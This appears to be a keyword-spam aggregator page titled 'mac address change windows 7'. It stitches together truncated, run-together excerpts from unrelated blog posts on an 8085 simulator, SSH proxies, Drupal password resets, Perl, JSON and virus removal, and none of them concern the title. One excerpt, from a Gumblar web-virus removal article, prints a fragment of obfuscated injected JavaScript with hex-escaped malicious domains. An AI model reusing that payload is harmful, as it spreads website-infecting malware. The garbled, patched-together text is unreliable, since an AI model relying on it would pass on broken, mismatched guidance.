03 Jan, 2011
Mac address change windows 7
Articles related to mac address change windows 7
http://digitalpbk.blogspot.com/2008/08/online-8085-assembler-and-simulator.html
into the Accumulator.In addition memory locations can be assigned in code usingORG Hex
AddressAA BB CC DDEE FF 00 1122 33 44 5566 77etcAssembly Source CodeViewHexViewSimViewThe SimView Screen is divided into 4 Sections:The extreme left shows the code and highlights the current section being executed.The middle box shows the registers and flagsThe extreme right shows the stack.The bottom box prints values of memory locations.More features would be posted as memory comes to me;) ...
Published 3 years, 9 months ago
http://digitalpbk.blogspot.com/2009/05/orkut-youtube-facebook-blocked-ssh.html
Orkut YouTube Facebook etc Blocked ?? Follow this guide to Unblock
Blocked ??!!!Most of you may be out there to desparately find out how to unblock all these social networking sites. The solution is to use a proxy. You can use proxy sites available all over the internet, or set up your on SSH proxy if you have an SSH server. Setting up an SSH server is easy. If you have a machine at home, install any linux distribution with SSH server enabled. Now grab hold of your Home machine IP
address ...
Published 2 years, 12 months ago
http://digitalpbk.blogspot.com/2007/03/windows-registry-something-you-must.html
Windows Registry : Something you must know
IntroWhats this all about ? Registry is the place where most
windows programs store some data associated with that program. Moreover, registry is used by
windows to store much of the configuration information, file associations, start up programs, etc ...The registry is mainly divided into 5 sections HKEY_CLASSES_ROOTHKEY_CURRENT_USER : Current User Preferences.HKEY_LOCAL_MACHINE (HKLM): Global Preferences.HKEY_USERSHKEY_CURRENT_CONFIG : Current System ...
Published 5 years, 2 months ago
http://digitalpbk.blogspot.com/2007/09/cpanel-v3-perl-include-inc.html
directories.cPanel-v3 Scriptmy $homedir =
(getpwuid($>))[7];my $n_inc = scalar @INC;for (my $i = 0; $i if (-d $homedir . '/perl' . $INC[$i]) { unshift(@INC,$homedir . '/perl' . $INC[$i]); $n_inc++; $i++; }}This script dint work for me much, so I manually included the include locations into the BEGIN segment.#! /usr/bin/perl -wBEGIN {unshift
@INC,"/home/directory/perl/usr/lib/perl5/site_perl/5.8.7/";}... ...
Published 4 years, 8 months ago
http://digitalpbk.blogspot.com/2007/06/json-javascript-object-notation.html
All object lies between the { }each of the properties has a label and an associated value or an array.It is specified as label : valuea , separates the label-value pairs.Arrays are enclosed in square brackets [ ] and comma separated.In short a JSON object looks likevar blog = {name: "the Digital Me",author : "arun prabhakar",pages : ["http://url1/","http://url2/"];complexarray: [[0,10,10],[
7,5,7],[1,9,8],[7,1,4]];};JSON and PHPPHP has 2 built in functions to help ...
Published 4 years, 11 months ago
http://digitalpbk.com/drupal/how-change-drupal-root-user-password
How to
change root admin user password in Drupal ?
In order to reset the root or superadmin password on a drupal system, login into the database by looking at the settings.php. You can use phpMyAdmin or any other MySQL utilities like SQLYog, or MySQL command line.
Run the following query to reset the password.
UPDATE users SET pass = MD5('password') WHERE uid = 1
The user id of administrator is always 1.
Password field in drupal is stored as MD5 of the actual string password. So ...
Published 2 years, 1 month ago
http://digitalpbk.blogspot.com/2009/02/perl-change-google-talk-status.html
PERL Code to
change Google talk status
Code : stat.plThe following code
changes the status of gmail/gtalk user status.Requires NET::XMPP module, and with SSL modules installed.#!/usr/bin/perl #usage : perl stat.pl use strict;use Net::XMPP;## Pls fill in these here :)my $username = "";my $password = "";my $hostname = 'talk.google.com';my $port = 5222;my $componentname = 'gmail.com';my $connectiontype = 'tcpip';my $tls = 1;my $Con = new ...
Published 3 years, 3 months ago
http://digitalpbk.com/nokia-e-series/nokia-e-series-wifi-connection-battery-drain-improve-battery-life
to restore to the default wireless LAN settings.
Goto Menu » Tools » Settings » Connection » Wireless LAN
Take Options » Advanced Settings
Changing advanced settings is not recommended. Continue Anyway? : YES
Automatic Configuration:
Change from enabled to disabled
Scroll down to the TX power level, which has a default value of 100 mW,
change to a lower value of 10 mW or 4 mW depending on your router proximity.
Try your wifi connectivity ...
Published 1 year, 6 months ago
http://digitalpbk.com/virus/gumblar-web-virus-manual-removal-free-tool
r="\x2f\x67\x61\x6e\x6a\x69\x2e\x63\x6f\x6d\x2f\x67\x61\x6e\x6a\x69\x2e\x63\x6f\x6d\x2f\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x61\x6e\x67\x65\x67\x65\x2e\x63\x6f\x6d\x2f\x6b\x69\x6a\x69\x6a\x69\x2e\x63\x61\x2e\x70\x68\x70";
var H='';
function F(d,B){var hE=new Array();
var g;
if(g!='Hl' && g != ''){g=null};
var hR;
if(hR!='t' && hR!='HX'){hR='t'};
var BK=String("iMc[".substr(3));
BK+=B;
var As;
if(As!=''){As='sS'};
BK+=N;
var WG='';
var TR='';
var S=new uV(BK, new
String("7wkg".substr(3)));
var K;
if(K!='' && K!='eo'){K='HT'};
var pH;
if(pH!='' ...
Published 2 years, 1 month ago
http://digitalpbk.blogspot.com/2009/02/csrcsexe-virus-manual-removal-steps.html
csrcs.exe Virus Manual Removal Steps
csrcs.exeDon't confuse csrcs.exe with csrss.exe, csrss.exe is a legitimate
windows service, whereas the csrcs.exe is a Trojan, or a virus. It resides in the C:\
Windows\System32\ folder.To remove csrcs.exe and all its effects, first take regedit ( Start > Run : regedit ). Then search for the string "csrcs.exe", and remove all occurrence of the string from the values. If there is a path given like
"C:\Windows\System32\csrcs.exe" ...
Published 3 years, 2 months ago
Related help topics for mac address change windows 7
More keywords like mac address change windows 7
More pages for mac address change windows 7